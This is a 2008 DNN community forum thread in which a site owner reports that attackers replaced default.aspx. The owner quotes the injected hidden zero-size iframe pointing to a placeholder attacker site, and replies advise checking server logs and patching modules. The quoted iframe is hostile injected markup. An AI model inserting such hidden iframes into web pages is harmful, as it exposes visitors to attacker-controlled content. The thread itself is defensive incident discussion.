Products

Solutions

Resources

Partners

Community

Blog

About

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen

HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...Website HackedWebsite Hacked
Previous
 
Next
New Post
2/3/2008 2:58 PM
 

I had my website hacked sometime in the past 24 hours. It is running version 4.7 of DNN.

It looks like the hackers replaced default.aspx with their own version, which added the following to the end of the file:

<iframe width=0 height=0 frameborder=0 marginwidth=0 marginheight=0 hspace=0 vspace=0 scrolling=no src=http://www.HackerSite.com/></iframe>

I've replaced the name of the hacker site with "HackerSite" above. The website worked as normal, other than playing an audio clip from their website. They could have done a lot of damage had they wanted, but I'm hoping they didn't,

I have gone through and changed all the passwords for the site, but is there some way I can figure out how this happened? Or take steps to prevent it from happening again? Or figure out what kind of damage was done?

 

 

 

 

 


Chris
 
New Post
2/3/2008 3:48 PM
 

Start by looking in your windows logfiles on the server %systemroot%\sytem32\logfiles is the typical location.  these files log just about everyting comming in and out of your server, there are some for firewall, some for IIS, FTP if you use FTP.  I'd first look for which service was hacked to allow unauthorized entry, these files will also let you know the IP address of the person who broke in so you can maybe cause them some trouble with thier ISP.

 

 


Josh Martin

 
New Post
2/3/2008 4:00 PM
 

Thank you Josh. Unfortunately I don't have any experience with log files, but I'm about to get started :).

I've contacted my hosting provider and they are looking into it. Hopefully they can help.

 


Chris
 
New Post
2/3/2008 4:09 PM
 

This is the typical "hack" that we see here on the forums.  However, when the hack itself involves the removal, editing or replacement of the default page as specified in your situation, the security vulnerability is not typically not with DNN.  Instead, the typical cause in the past has proven to be a server weakness (missing updates, bad permissions, IIS misconfiguation, etc.).  In one instance that I know of, a vulerability in a 3rd Party DNN Module allowed this to happen.


Will Strohl

Upendo Ventures Upendo Ventures
DNN experts since 2003
Official provider of the Hotcakes Commerce Cloud and SLA support
 
New Post
2/3/2008 4:30 PM
 

Is there anything I can do on my end, other than making sure I have updated my 3rd party modules?

I fear that I'm a bit at the mercy of my hosting provider, so far as security. I certainly don't want to accuse them of doing anything wrong or being lax in security matters, especially if it's something I've done. My passwords for the site are strong (as far as I can tell), but I'm not in the habit of changing them.


Chris
 
Previous
 
Next
HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...Website HackedWebsite Hacked


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out